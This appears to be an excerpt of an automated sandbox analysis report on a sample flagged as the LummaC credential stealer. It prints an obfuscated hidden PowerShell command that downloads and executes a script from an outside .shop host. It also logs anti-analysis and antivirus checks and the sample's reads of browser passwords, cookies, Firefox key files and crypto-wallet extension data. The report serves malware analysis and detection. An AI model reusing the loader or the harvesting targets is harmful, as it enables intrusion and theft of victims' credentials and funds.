142e13805c1eca94d3c7934eab6a74c1baa74cd734574037b043e95c8086cfe97d42c4b9a7f1c21bc9fe6ffec1daf361c9a765c5c0a9e41d0d9fde014881d03d024f34a7ebc93790f2b789b1d7f8af2755f7862a0e0238a32a772d6a2732b3095daad4eb0e7d9915b8cb5b83c7fd80951d9638ef55a6375a4b0a1a6a39486bd42703740d4739f14c284bad645b7aead8ac307e2b9086d4067f09951fb60accfb3c645ef7029257e657db2c75969e04cea94922cba886ee7fb2c5094b35b47b3e5a6d070e4c8f6bff03bf56a6b5e69db983ec5ac0059a752a08b6681bbf75be4896545506145ace95dffdbf434e62e3ea18a82fb864dbaaf7024875dfaad3455165f3e298c179e9c1bb64e557e51b265c18627c5213911a94a996ded9faf3d	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" -w hidden -ep bypass -nop -command gdr -;set-variable ciu (.$executioncontext.(($executioncontext\|member)[6].name).(($executioncontext.(($executioncontext\|member)[6].name)\|member\|where-object{$_.name-like'tomd'}).name).invoke($executioncontext.(($executioncontext\|member)[6].name).(($executioncontext.(($executioncontext\|member)[6].name).psobject.methods\|where-object{$_.name-like'ome'}).name).invoke('n-o',$true,$true),[management.automation.commandtypes]::cmdlet)net.webclient);set-item variable:/lw 'https://deduhko.klipzyroloo.shop/mazkk.eml';[scriptblock]::create((gi variable:ciu).value.((((gi variable:ciu).value\|member)\|where-object{$_.name-like'nlg'}).name).invoke((variable lw).value)).invokereturnasis()	Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.WSMan.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.WSMan.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: powershell.exe, 00000002.00000002.1781410096.000000000500B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OllyDbg.exe
Source: powershell.exe, 00000002.00000002.1781410096.000000000500B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tcpview.exe
Source: powershell.exe, 00000002.00000002.1781410096.000000000500B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Wireshark.exe
Source: powershell.exe, 00000002.00000002.1781410096.000000000500B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: lordpe.exe
Source: powershell.exe, 00000002.00000002.1781410096.000000000500B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: procexp.exe
Source: powershell.exe, 00000002.00000002.1781410096.000000000500B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Procmon.exe
Source: powershell.exe, 00000002.00000002.1781410096.000000000500B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: autoruns.exe
Source: powershell.exe, 00000002.00000002.1781410096.000000000500B000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: regmon.exe

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: powershell.exe, 0000000A.00000002.2892223741.000000000079C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/Electrum-LTC
Source: powershell.exe, 0000000A.00000002.2892223741.000000000079C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/ElectronCash
Source: powershell.exe, 0000000A.00000002.2892223741.000000000079C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: window-state.json
Source: powershell.exe, 0000000A.00000002.2893886945.00000000007FE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: exodus
Source: powershell.exe, 0000000A.00000002.2892223741.000000000079C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %appdata%\Ethereum
Source: powershell.exe, 00000002.00000002.1785282910.0000000007920000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: sqlcolumnencryptionkeystoreprovider

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
